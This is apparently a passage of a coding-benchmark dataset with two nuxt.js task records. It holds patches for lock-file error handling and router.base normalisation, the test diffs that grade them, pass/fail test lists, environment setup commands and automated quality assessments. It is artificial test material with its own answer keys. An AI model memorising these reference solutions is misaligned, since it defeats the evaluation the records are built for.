"should ignore route with * and :", "should resolve route with /", "should guard parent dir", "should guard same dir", "should not guard same level dir", "should not guard same level dir - 2", "should not guard child dir", "should promisify array routes", "should promisify functional routes", "should promisify promisable functional routes", "should promisify promisable functional routes with arguments", "should promisify functional routes with error", "should promisify functional routes with arguments and error", "should promisify functional routes with result", "should promisify functional routes with arguments and result", "createRoutes should allow snake case routes in posix system", "timeout (promise)", "timeout (async function)", "timeout (timeout in 100ms)", "timeout (async timeout in 100ms)", "waitFor", "should construct Timer", "should create new time record", "should stop and remove time record", "should be quiet if end with nonexistent time", "should use bigint hrtime if supports", "should calculate duration with bigint hrtime", "should use hrtime if bigint it not supported", "should calculate duration with hrtime", "should clear all times", "should return dev filenames", "should return prod filenames", "should return modern filenames", "should export all methods from utils folder", "onCompromised lock warns on compromise by default", "can override default options", "createLockPath creates the same lockPath for identical locks", "createLockPath creates unique lockPaths for different ids", "createLockPath creates unique lockPaths for different dirs", "createLockPath creates unique lockPaths for different roots", "getLockPath creates lockPath when it doesnt exists", "lock creates a lock and returns a release fn", "lock throws error when lock already exists", "lock returns a release method for unlocking both lockfile as lockPath", "lock release also cleansup onExit set", "lock sets exit listener once to remove lockPaths", "exit listener removes all lockPaths 
when called", "lock uses setLockOptions to set defaults" ]
Function: lock({ id, dir, root, options }) Location: packages/utils/src/locking.js Inputs: An object `config` containing - `id` (string): identifier for the lock, - `dir` (string): directory where the lock file should be placed, - optional `root` (string) and `options` (object) passed to **proper‑lockfile**. Outputs: Returns a `Promise` that resolves to - `false` when the lock cannot be obtained, or - an **async release function** that removes the lock file/directory and releases the lock. All errors thrown by `proper‑lockfile` (`check` or `lock`) are caught; duplicate‑lock cases trigger `consola.fatal`, other errors are logged via `consola.debug` (or `consola.warn` for acquire failures). The release function also catches errors, logs them with `consola.debug`, and cleans up compromised lock directories when appropriate. Description: Acquires a filesystem lock using `proper‑lockfile`, handling all possible error paths, and provides a safe release callback. Use it when you need mutually‑exclusive access to a resource and want robust error handling without uncaught exceptions.
MIT
{ "base_image_name": "node_16", "install": [ "sed -i '/\"packageManager\":/d' package.json", "npm install --prefer-offline --no-audit --progress=false --ignore-scripts --legacy-peer-deps", "npx lerna link", "npx jiti ./scripts/pkg.js" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --forceExit --verbose --silent --passWithNoTests packages/" }
{ "num_modified_files": 1, "num_modified_lines": 44, "pr_author": "pimlie", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.87, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue asks to wrap all proper‑lockfile calls in try/catch so that errors are caught and a warning is logged, with only duplicate lock ids causing a fatal error. The provided test patch asserts exactly this behavior, checking warning logs for lock acquisition failures, debug logs for errors during check and release, and proper handling of compromised locks. No test assertions rely on unrelated modules, external URLs, or undocumented naming conventions, and the specification covers the required outcomes. Therefore the task is well‑specified and the tests align, resulting in a clean solvable classification.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": 
null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
3c50876d737ced86f2e3677c1ee7be6328dcdcc9
2019-03-22 22:52:21
codecov-io: # [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5349?src=pr&el=h1) Report > Merging [#5349](https://codecov.io/gh/nuxt/nuxt.js/pull/5349?src=pr&el=desc) into [dev](https://codecov.io/gh/nuxt/nuxt.js/commit/3c50876d737ced86f2e3677c1ee7be6328dcdcc9?src=pr&el=desc) will **not change** coverage. > The diff coverage is `n/a`. [![Impacted file tree graph](https://codecov.io/gh/nuxt/nuxt.js/pull/5349/graphs/tree.svg?width=650&token=nGD1PtMB3M&height=150&src=pr)](https://codecov.io/gh/nuxt/nuxt.js/pull/5349?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## dev #5349 +/- ## ======================================= Coverage 95.66% 95.66% ======================================= Files 74 74 Lines 2513 2513 Branches 639 639 ======================================= Hits 2404 2404 Misses 92 92 Partials 17 17 ``` ------ [Continue to review full report at Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5349?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5349?src=pr&el=footer). Last update [3c50876...01b1cb2](https://codecov.io/gh/nuxt/nuxt.js/pull/5349?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments).
nuxt__nuxt.js-5349
diff --git a/examples/with-element-ui/package.json b/examples/with-element-ui/package.json index 6e1108f59..6dd5c6c8c 100644 --- a/examples/with-element-ui/package.json +++ b/examples/with-element-ui/package.json @@ -3,14 +3,14 @@ "version": "1.0.0", "license": "MIT", "dependencies": { - "element-ui": "^2", - "nuxt": "latest", - "post-update": "yarn upgrade --latest" + "element-ui": "^2.6.3", + "nuxt": "latest" }, "scripts": { "dev": "nuxt", "build": "nuxt build", - "start": "nuxt start" + "start": "nuxt start", + "post-update": "yarn upgrade --latest" }, "devDependencies": { "node-sass": "^4.6.0", diff --git a/packages/builder/src/builder.js b/packages/builder/src/builder.js index e4ebf4d3a..ec6956abd 100644 --- a/packages/builder/src/builder.js +++ b/packages/builder/src/builder.js @@ -222,7 +222,7 @@ export default class Builder { 'Using npm:\n', `npm i ${dependencyFixes.join(' ')}\n` ) - throw new Error('Missing Template Dependencies') + throw new Error('Missing App Dependencies') } } diff --git a/packages/utils/src/locking.js b/packages/utils/src/locking.js index d0ee5f0f0..c9b7fc15b 100644 --- a/packages/utils/src/locking.js +++ b/packages/utils/src/locking.js @@ -35,16 +35,33 @@ export async function getLockPath(config) { export async function lock({ id, dir, root, options }) { const lockPath = await getLockPath({ id, dir, root }) - const locked = await properlock.check(lockPath) - if (locked) { - consola.fatal(`A lock with id '${id}' already exists on ${dir}`) + try { + const locked = await properlock.check(lockPath) + if (locked) { + consola.fatal(`A lock with id '${id}' already exists on ${dir}`) + } + } catch (e) { + consola.debug(`Check for an existing lock with id '${id}' on ${dir} failed`, e) } - options = getLockOptions(options) - const release = await properlock.lock(lockPath, options) + let lockWasCompromised = false + let release + + try { + options = getLockOptions(options) + + const onCompromised = options.onCompromised + options.onCompromised = 
(err) => { + onCompromised(err) + lockWasCompromised = true + } + + release = await properlock.lock(lockPath, options) + } catch (e) {} if (!release) { consola.warn(`Unable to get a lock with id '${id}' on ${dir} (but will continue)`) + return false } if (!lockPaths.size) { @@ -59,8 +76,27 @@ export async function lock({ id, dir, root, options }) { lockPaths.add(lockPath) return async function lockRelease() { - await release() - await fs.remove(lockPath) - lockPaths.delete(lockPath) + try { + await fs.remove(lockPath) + lockPaths.delete(lockPath) + + // release as last so the lockPath is still removed + // when it fails on a compromised lock + await release() + } catch (e) { + if (!lockWasCompromised || !e.message.includes('already released')) { + consola.debug(e) + return + } + + // proper-lockfile doesnt remove lockDir when lock is compromised + // removing it here could cause the 'other' process to throw an error + // as well, but in our case its much more likely the lock was + // compromised due to mtime update timeouts + const lockDir = `${lockPath}.lock` + if (await fs.exists(lockDir)) { + await fs.remove(lockDir) + } + } } } diff --git a/packages/vue-app/package.json b/packages/vue-app/package.json index 4bb821abb..ae8b26aa0 100644 --- a/packages/vue-app/package.json +++ b/packages/vue-app/package.json @@ -12,6 +12,7 @@ "main": "dist/vue-app.js", "typings": "types/index.d.ts", "dependencies": { + "core-js": "^2.6.5", "node-fetch": "^2.3.0", "unfetch": "^4.1.0", "vue": "^2.6.10",
examples(with-element-ui): fix package scripts
**Title** Improve example configuration, error messaging, locking reliability, and polyfill support **Problem** * The Element UI example had an incorrectly placed script and an overly broad version range, leading to broken npm/yarn commands. * Builder emitted a misleading error label, confusing developers about the missing dependencies. * The locking utility could fail silently or leave stale lock artefacts, risking race conditions. * The Vue‑App package missed a core‑js polyfill, causing runtime failures in certain environments. **Root Cause** * Misconfiguration of package scripts and dependency versioning. * Inexact error wording and insufficient handling of lockfile errors. * Omitted polyfill dependency. **Fix / Expected Behavior** - Relocate the post‑update command to the proper script section and constrain the UI library version. - Update the builder’s error message to accurately describe missing application dependencies. - Reinforce the lock mechanism: catch check errors, detect compromised locks, ensure lock files are cleaned up, and return a clear failure indicator. - Add the core‑js package to the Vue‑App dependencies for required polyfills. **Risk & Validation** - Verify the example builds and starts correctly with the new script layout. - Run the builder on a project with missing dependencies to confirm the revised error message appears. - Execute concurrent lock operations to ensure no stale locks remain and that compromised locks are handled gracefully. - Run the Vue‑App in environments requiring polyfills to confirm the added core‑js resolves previous runtime errors.
5,349
nuxt/nuxt.js
diff --git a/packages/builder/test/builder.build.test.js b/packages/builder/test/builder.build.test.js index 8c16aea08..9274ee73f 100644 --- a/packages/builder/test/builder.build.test.js +++ b/packages/builder/test/builder.build.test.js @@ -263,7 +263,7 @@ describe('builder: builder build', () => { .mockReturnValueOnce({ version: 'alpha' }) .mockReturnValueOnce(undefined) - expect(() => builder.validateTemplate()).toThrow('Missing Template Dependencies') + expect(() => builder.validateTemplate()).toThrow('Missing App Dependencies') expect(nuxt.resolver.requireModule).toBeCalledTimes(2) expect(nuxt.resolver.requireModule).nthCalledWith(1, 'join(vue, package.json)') diff --git a/packages/utils/test/locking.test.js b/packages/utils/test/locking.test.js index 225c64157..52acfd6dd 100644 --- a/packages/utils/test/locking.test.js +++ b/packages/utils/test/locking.test.js @@ -61,7 +61,7 @@ describe('util: locking', () => { }) test('lock creates a lock and returns a release fn', async () => { - properlock.lock.mockImplementationOnce(() => true) + properlock.lock.mockReturnValue(true) const fn = await lock(lockConfig) @@ -75,7 +75,7 @@ describe('util: locking', () => { }) test('lock throws error when lock already exists', async () => { - properlock.check.mockImplementationOnce(() => true) + properlock.check.mockReturnValue(true) await lock(lockConfig) expect(properlock.check).toHaveBeenCalledTimes(1) @@ -84,7 +84,19 @@ describe('util: locking', () => { }) test('lock logs warning when it couldnt get a lock', async () => { - properlock.lock.mockImplementationOnce(() => false) + properlock.lock.mockReturnValue(false) + + const fn = await lock(lockConfig) + expect(fn).toBe(false) + expect(properlock.lock).toHaveBeenCalledTimes(1) + expect(consola.warn).toHaveBeenCalledTimes(1) + expect(consola.warn).toHaveBeenCalledWith(`Unable to get a lock with id '${lockConfig.id}' on ${lockConfig.dir} (but will continue)`) + }) + + test('lock logs warning when proper.lock threw error', 
async () => { + properlock.lock.mockImplementation(() => { + throw new Error('test error') + }) await lock(lockConfig) expect(properlock.lock).toHaveBeenCalledTimes(1) @@ -94,7 +106,7 @@ describe('util: locking', () => { test('lock returns a release method for unlocking both lockfile as lockPath', async () => { const release = jest.fn() - properlock.lock.mockImplementationOnce(() => release) + properlock.lock.mockImplementation(() => release) const fn = await lock(lockConfig) await fn() @@ -105,7 +117,7 @@ describe('util: locking', () => { test('lock release also cleansup onExit set', async () => { const release = jest.fn() - properlock.lock.mockImplementationOnce(() => release) + properlock.lock.mockImplementation(() => release) const fn = await lock(lockConfig) expect(lockPaths.size).toBe(1) @@ -114,8 +126,58 @@ describe('util: locking', () => { expect(lockPaths.size).toBe(0) }) + test('lock release only logs error when error thrown', async () => { + const release = jest.fn(() => { + throw new Error('test error') + }) + properlock.lock.mockImplementation(() => release) + + const fn = await lock(lockConfig) + await expect(fn()).resolves.not.toThrow() + + expect(consola.debug).toHaveBeenCalledTimes(1) + }) + + test('lock check only logs error when error thrown', async () => { + const testError = new Error('check error') + properlock.lock.mockImplementation(() => () => {}) + properlock.check.mockImplementation(() => { + throw testError + }) + + const fn = await lock(lockConfig) + expect(fn).toEqual(expect.any(Function)) + + expect(consola.debug).toHaveBeenCalledTimes(1) + expect(consola.debug).toHaveBeenCalledWith(`Check for an existing lock with id '${lockConfig.id}' on ${lockConfig.dir} failed`, testError) + }) + + test('lock release doesnt log error when error thrown because lock compromised', async () => { + fs.exists.mockReturnValue(true) + const testError = new Error('Lock is already released') + const release = jest.fn(() => { + throw testError + }) + + 
properlock.lock.mockImplementation((path, options) => { + options.onCompromised() + return release + }) + + const fn = await lock({ + ...lockConfig, + options: { + // overwrite default compromised which calls consola.warn + onCompromised() {} + } + }) + + await expect(fn()).resolves.not.toThrow() + expect(consola.warn).not.toHaveBeenCalled() + }) + test('lock sets exit listener once to remove lockPaths', async () => { - properlock.lock.mockImplementationOnce(() => true) + properlock.lock.mockReturnValue(true) await lock(lockConfig) await lock(lockConfig) @@ -124,8 +186,10 @@ describe('util: locking', () => { }) test('exit listener removes all lockPaths when called', async () => { + properlock.lock.mockReturnValue(true) + let callback - onExit.mockImplementationOnce(cb => (callback = cb)) + onExit.mockImplementation(cb => (callback = cb)) const lockConfig2 = Object.assign({}, lockConfig, { id: 'id2' }) @@ -145,7 +209,7 @@ describe('util: locking', () => { }) test('lock uses setLockOptions to set defaults', async () => { - const spy = properlock.lock.mockImplementationOnce(() => true) + const spy = properlock.lock.mockReturnValue(true) await lock(lockConfig)
[ "lock logs warning when it couldnt get a lock", "lock logs warning when proper.lock threw error", "lock release only logs error when error thrown", "lock check only logs error when error thrown", "lock release doesnt log error when error thrown because lock compromised" ]
[ "should export getDefaultNuxtConfig and getNuxtConfig", "should return server configurations with NUXT_* env", "should return server configurations with env", "should return server configurations with npm_* env", "should export Builder", "should check if path starts with alias", "should check if path starts with root alias", "should check if path starts with src alias", "should return same path in linux", "should define alias", "should check if given argument is index file or folder", "should return main module", "should resolve alias path", "should keep webpack inline loaders prepended", "should check path which is not started with alias", "should return default nuxt configurations", "should return nuxt configurations with custom env", "should export Server and Listener", "should construct Ignore", "should add ignore file", "should find ignore file", "should only find existed ignore file", "should filter ignore files", "should return origin paths if there is no ignorefile", "should reload ignore", "should return dev filenames", "should return prod filenames", "should return modern filenames", "should construct context", "should check if given argument is string", "should check if given argument is empty string", "should check if given argument is pure object", "should check if given argument is url", "should wrap given argument with array", "should strip white spaces in given argument", "should encode html", "should join url", "should export Module, Nuxt and Resolver", "should return false in default shouldPrefetch", "should return true in script/style shouldPreload", "should return false in other shouldPreload", "should return globals with given globalName", "should return error middleware", "should send html error response", "should send json error response", "should send html error response by youch in debug mode", "should send json error response by youch in debug mode", "should search all possible paths when read source", "should return source content after 
read source", "should return relative fileName if fileName is absolute path", "should ignore error when reading source", "should return if fileName is unknown when read source", "should return modern middleware", "should not detect modern build if modern mode is specified", "should detect client modern build and display message", "should detect server modern build and display message", "should not detect modern browser if modern build is not found", "should not detect modern browser if connect has been detected", "should detect modern browser based on user-agent", "should detect legacy browser based on user-agent", "should ignore illegal user-agent", "should return builder plugins context", "should return builder build options", "should get context with req and res", "should get correct globals", "timeout (promise)", "timeout (async function)", "timeout (timeout in 100ms)", "timeout (async timeout in 100ms)", "waitFor", "should construct Timer", "should create new time record", "should stop and remove time record", "should be quiet if end with nonexistent time", "should use bigint hrtime if supports", "should calculate duration with bigint hrtime", "should use hrtime if bigint it not supported", "should calculate duration with hrtime", "should clear all times", "should flat route with path", "should ignore route with * and :", "should resolve route with /", "should guard parent dir", "should guard same dir", "should not guard same level dir", "should not guard same level dir - 2", "should not guard child dir", "should promisify array routes", "should promisify functional routes", "should promisify promisable functional routes", "should promisify promisable functional routes with arguments", "should promisify functional routes with error", "should promisify functional routes with arguments and error", "should promisify functional routes with result", "should promisify functional routes with arguments and result", "createRoutes should allow snake case routes in posix 
system", "should export Generator", "should call fn in sequence", "should call fn in parallel", "chainFn (mutate, mutate)", "chainFn (mutate, return)", "chainFn (return, mutate)", "chainFn (return, return)", "chainFn (return, non-function)", "chainFn (non-function, return)", "should serialize normal function", "should serialize shorthand function", "should serialize arrow function", "should not replace custom scripts", "should serialize internal function", "should list all commands", "should import relative module", "should import core module", "should print error when module not found", "should throw error when error is not module not found", "should construct listener", "should listen http host and port", "should listen https host and port", "should listen unix socket host and port", "should prevent listening multiple times", "should throw error if error occurred or listen failed", "should compute http url", "should compute https url", "should compute unix socket url", "should throw error in serverErrorHandler", "should throw address in use error", "should throw address in use error for socket", "should fallback to a random port in address in use error", "should close server", "should prevent destroying server if server is not listening", "should export all methods from utils folder", "onCompromised lock warns on compromise by default", "can override default options", "createLockPath creates the same lockPath for identical locks", "createLockPath creates unique lockPaths for different ids", "createLockPath creates unique lockPaths for different dirs", "createLockPath creates unique lockPaths for different roots", "getLockPath creates lockPath when it doesnt exists", "lock creates a lock and returns a release fn", "lock throws error when lock already exists", "lock returns a release method for unlocking both lockfile as lockPath", "lock release also cleansup onExit set", "lock sets exit listener once to remove lockPaths", "exit listener removes all lockPaths when 
called", "lock uses setLockOptions to set defaults" ]
Method: Builder.validateTemplate() Location: packages/builder/src/builder.js → class Builder Inputs: (none) – called on a Builder instance after template analysis. Outputs: Throws Error with message **'Missing App Dependencies'** when required app dependencies are not found; otherwise returns undefined. Description: Validates that the Nuxt application template includes all required dependencies; used during the build step to abort with a clear error if any are missing. Function: lock({ id, dir, root, options }) Location: packages/utils/src/locking.js → exported async function lock Inputs: - id (string) – unique identifier for the lock. - dir (string) – directory where the lock file will be placed. - root (string, optional) – base path for resolving the lock path. - options (object, optional) – lockfile options (e.g., stale, retries, onCompromised callback). Outputs: - false if the lock could not be acquired (properlock.lock returns falsy). - function release when the lock is obtained; calling the function releases the lock, removes the lock file, and logs/debugs any errors (including handling compromised‑lock scenarios). Description: Acquires a process‑wide lock using proper-lockfile, handling existing locks, errors during the check, and compromised locks; returns a release callback or false to allow the caller to continue without a lock.
MIT
{ "base_image_name": "node_16", "install": [ "sed -i '/\"packageManager\":/d' package.json", "npm install --prefer-offline --no-audit --progress=false --ignore-scripts --legacy-peer-deps", "npx lerna link", "npx jiti ./scripts/pkg.js" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --forceExit --verbose --silent --passWithNoTests packages/" }
{ "num_modified_files": 4, "num_modified_lines": 50, "pr_author": "aldarund", "pr_labels": [], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.86, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue only mentions fixing scripts in the with‑element‑ui example, but the provided test patch expects changes to the builder error message and extensive behavior adjustments in the locking utility. The tests therefore verify requirements that are not stated in the issue, making the specification ambiguous. This signals an environment‑preparation problem rather than a clearly defined task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests expect builder.validateTemplate to throw 'Missing App Dependencies' instead of the documented 'Missing Template Dependencies'.", "Tests add numerous new expectations for the locking utility (return values, warning logs, error handling) that are not mentioned in the issue." 
], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
3cdce79d133da0ff0dd8c243e478fe89d5aa771b
2019-04-05 11:20:32
codecov-io: # [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=h1) Report > Merging [#5470](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=desc) into [dev](https://codecov.io/gh/nuxt/nuxt.js/commit/3cdce79d133da0ff0dd8c243e478fe89d5aa771b?src=pr&el=desc) will **increase** coverage by `<.01%`. > The diff coverage is `100%`. [![Impacted file tree graph](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/graphs/tree.svg?width=650&token=nGD1PtMB3M&height=150&src=pr)](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## dev #5470 +/- ## ========================================== + Coverage 96.13% 96.13% +<.01% ========================================== Files 74 74 Lines 2559 2562 +3 Branches 651 652 +1 ========================================== + Hits 2460 2463 +3 Misses 83 83 Partials 16 16 ``` | [Impacted Files](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [packages/server/src/server.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/diff?src=pr&el=tree#diff-cGFja2FnZXMvc2VydmVyL3NyYy9zZXJ2ZXIuanM=) | `97.72% <ø> (ø)` | :arrow_up: | | [packages/config/src/options.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/diff?src=pr&el=tree#diff-cGFja2FnZXMvY29uZmlnL3NyYy9vcHRpb25zLmpz) | `100% <100%> (ø)` | :arrow_up: | | [packages/server/src/listener.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/diff?src=pr&el=tree#diff-cGFja2FnZXMvc2VydmVyL3NyYy9saXN0ZW5lci5qcw==) | `100% <100%> (ø)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=footer). Last update [3cdce79...e368719](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=lastupdated). 
Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). codecov-io: # [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=h1) Report > Merging [#5470](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=desc) into [dev](https://codecov.io/gh/nuxt/nuxt.js/commit/3cdce79d133da0ff0dd8c243e478fe89d5aa771b?src=pr&el=desc) will **increase** coverage by `<.01%`. > The diff coverage is `100%`. [![Impacted file tree graph](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/graphs/tree.svg?width=650&token=nGD1PtMB3M&height=150&src=pr)](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## dev #5470 +/- ## ========================================== + Coverage 96.13% 96.13% +<.01% ========================================== Files 74 74 Lines 2559 2562 +3 Branches 651 652 +1 ========================================== + Hits 2460 2463 +3 Misses 83 83 Partials 16 16 ``` | [Impacted Files](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [packages/server/src/server.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/diff?src=pr&el=tree#diff-cGFja2FnZXMvc2VydmVyL3NyYy9zZXJ2ZXIuanM=) | `97.72% <ø> (ø)` | :arrow_up: | | [packages/config/src/options.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/diff?src=pr&el=tree#diff-cGFja2FnZXMvY29uZmlnL3NyYy9vcHRpb25zLmpz) | `100% <100%> (ø)` | :arrow_up: | | [packages/server/src/listener.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/diff?src=pr&el=tree#diff-cGFja2FnZXMvc2VydmVyL3NyYy9saXN0ZW5lci5qcw==) | `100% <100%> (ø)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=footer). 
Last update [3cdce79...e368719](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). clarkdo: Is this a minor breaking change for users are using url without trailing slash ?
nuxt__nuxt.js-5470
diff --git a/packages/config/src/options.js b/packages/config/src/options.js index fb8d5dd85..f985b4c94 100644 --- a/packages/config/src/options.js +++ b/packages/config/src/options.js @@ -22,6 +22,7 @@ export function getNuxtConfig(_options) { if (options.loading === true) { delete options.loading } + if ( options.router && options.router.middleware && @@ -29,15 +30,19 @@ export function getNuxtConfig(_options) { ) { options.router.middleware = [options.router.middleware] } + if (options.router && typeof options.router.base === 'string') { options._routerBaseSpecified = true } + if (typeof options.transition === 'string') { options.transition = { name: options.transition } } + if (typeof options.layoutTransition === 'string') { options.layoutTransition = { name: options.layoutTransition } } + if (typeof options.extensions === 'string') { options.extensions = [options.extensions] } @@ -69,6 +74,11 @@ export function getNuxtConfig(_options) { defaultsDeep(options, nuxtConfig) + // Sanitize router.base + if (!/\/$/.test(options.router.base)) { + options.router.base += '/' + } + // Check srcDir and generate.dir existence const hasSrcDir = isNonEmptyString(options.srcDir) const hasGenerateDir = isNonEmptyString(options.generate.dir) @@ -221,7 +231,7 @@ export function getNuxtConfig(_options) { }) } - // vue config + // Vue config const vueConfig = options.vue.config if (vueConfig.silent === undefined) { diff --git a/packages/server/src/listener.js b/packages/server/src/listener.js index 04f13a442..dfbb0e549 100644 --- a/packages/server/src/listener.js +++ b/packages/server/src/listener.js @@ -6,7 +6,7 @@ import consola from 'consola' import pify from 'pify' export default class Listener { - constructor({ port, host, socket, https, app, dev }) { + constructor({ port, host, socket, https, app, dev, baseURL }) { // Options this.port = port this.host = host @@ -14,6 +14,7 @@ export default class Listener { this.https = https this.app = app this.dev = dev + this.baseURL = 
baseURL // After listen this.listening = false @@ -46,7 +47,7 @@ export default class Listener { case '0.0.0.0': this.host = ip.address(); break } this.port = address.port - this.url = `http${this.https ? 's' : ''}://${this.host}:${this.port}` + this.url = `http${this.https ? 's' : ''}://${this.host}:${this.port}${this.baseURL}` return } this.url = `unix+http://${address}` diff --git a/packages/server/src/server.js b/packages/server/src/server.js index e937f00fb..483aa091f 100644 --- a/packages/server/src/server.js +++ b/packages/server/src/server.js @@ -239,7 +239,8 @@ export default class Server { socket: socket || this.options.server.socket, https: this.options.server.https, app: this.app, - dev: this.options.dev + dev: this.options.dev, + baseURL: this.options.router.base }) // Listen
fix: improve `router.base` handling <!--- Provide a general summary of your changes in the title above --> ## Types of changes <!--- What types of changes does your code introduce? Put an `x` in all the boxes that apply: --> - [x] Bug fix (a non-breaking change which fixes an issue) - [ ] New feature (a non-breaking change which adds functionality) - [ ] Breaking change (fix or feature that would cause existing functionality to change) ## Description This PR addresses some problems with `router.base` handling and is complementary to nuxt/loading-screen#8. - Always sanitize router base to end with `/`. Previously we were just mentioning it in the docs. - Append router base to the listener computed URL. fixes issue with `-o` and CLI banner. ![image](https://user-images.githubusercontent.com/5158436/55624220-8184ac00-57ba-11e9-96d0-d79a443aed5c.png) ## Checklist: <!--- Put an `x` in all the boxes that apply. --> <!--- If your change requires a documentation PR, please link it appropriately --> <!--- If you're unsure about any of these, don't hesitate to ask. We're here to help! --> - [ ] My change requires a change to the documentation. - [ ] I have updated the documentation accordingly. (PR: #) - [ ] I have added tests to cover my changes (if not applicable, please state why) - [ ] All new and existing tests are passing.
**Title** Normalize `router.base` and include it in server listening URLs **Problem** When a custom router base is provided without a trailing slash, URLs generated by Nuxt (e.g., CLI banner, `-o` flag) are malformed. The server also reports its listening address without the configured base path. **Root Cause** The router base is stored verbatim and the listener builds its URL string without consulting the router configuration. **Fix / Expected Behavior** - Ensure the router base always ends with a trailing “/”. - Propagate the normalized base to the server listener so the reported URL contains the base path. - Record whether a router base was explicitly set for internal use. - Preserve existing functionality for cases where the base already includes a slash. - CLI output and related tooling now display correct, fully‑qualified URLs. **Risk & Validation** - Verify that adding a trailing slash does not introduce double‑slashes in route resolution. - Confirm that the listener URL is correct for both standard host/port and Unix socket configurations. - Run the full test suite and manually check the CLI banner and `-o` flag for accurate URLs.
5,470
nuxt/nuxt.js
